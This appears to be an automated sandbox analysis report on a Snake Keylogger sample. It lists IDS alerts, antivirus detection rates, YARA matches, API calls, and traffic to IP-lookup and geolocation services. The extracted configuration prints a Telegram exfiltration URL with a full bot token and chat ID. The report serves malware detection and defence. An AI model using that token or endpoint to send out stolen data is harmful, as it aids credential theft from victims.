2025-01-11T03:45:19.809850+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49774	132.226.8.169	80	TCP
2025-01-11T03:45:23.450550+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49788	132.226.8.169	80	TCP
2025-01-11T03:45:32.950520+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49866	132.226.8.169	80	TCP
2025-01-11T03:45:33.951348+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49866	132.226.8.169	80	TCP
2025-01-11T03:45:36.497397+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49886	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg/sendMessage?chat_id=1217600190", "Token": "7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg", "Chat_id": "1217600190", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: MBOaS3GRtF.exe	Virustotal: Detection: 69%			Perma Link
Source: MBOaS3GRtF.exe	ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MBOaS3GRtF.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: MBOaS3GRtF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49759 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49875 version: TLS 1.0

Source:	Binary string: wntdll.pdbUGP source: supergroup.exe, 00000002.00000003.1394176182.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000002.00000003.1393379935.0000000003970000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1560299894.0000000004130000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1559995710.00000000042D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: supergroup.exe, 00000002.00000003.1394176182.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000002.00000003.1393379935.0000000003970000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1560299894.0000000004130000.00000004.00001000.00020000.00000000.sdmp, supergroup.exe, 00000006.00000003.1559995710.00000000042D0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B0445A
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0C6D1 FindFirstFileW,FindClose,	0_2_00B0C6D1
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B0C75C
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0EF95
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F0F2
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0F3F3
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B037EF
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03B12
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0BCBC
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0022445A
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022C6D1 FindFirstFileW,FindClose,	2_2_0022C6D1
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0022C75C
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0022EF95
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0022F0F2
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0022F3F3
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_002237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_002237EF
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00223B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00223B12
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0022BCBC

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49774 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49788 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49744 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49886 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49866 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49854 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49804 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49837 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49770 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49947 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49880 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49759 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49875 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00B122EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002718000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: supergroup.exe, 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, supergroup.exe, 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgp
Source: RegSvcs.exe, 00000003.00000002.1573554245.0000000005B40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002743000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
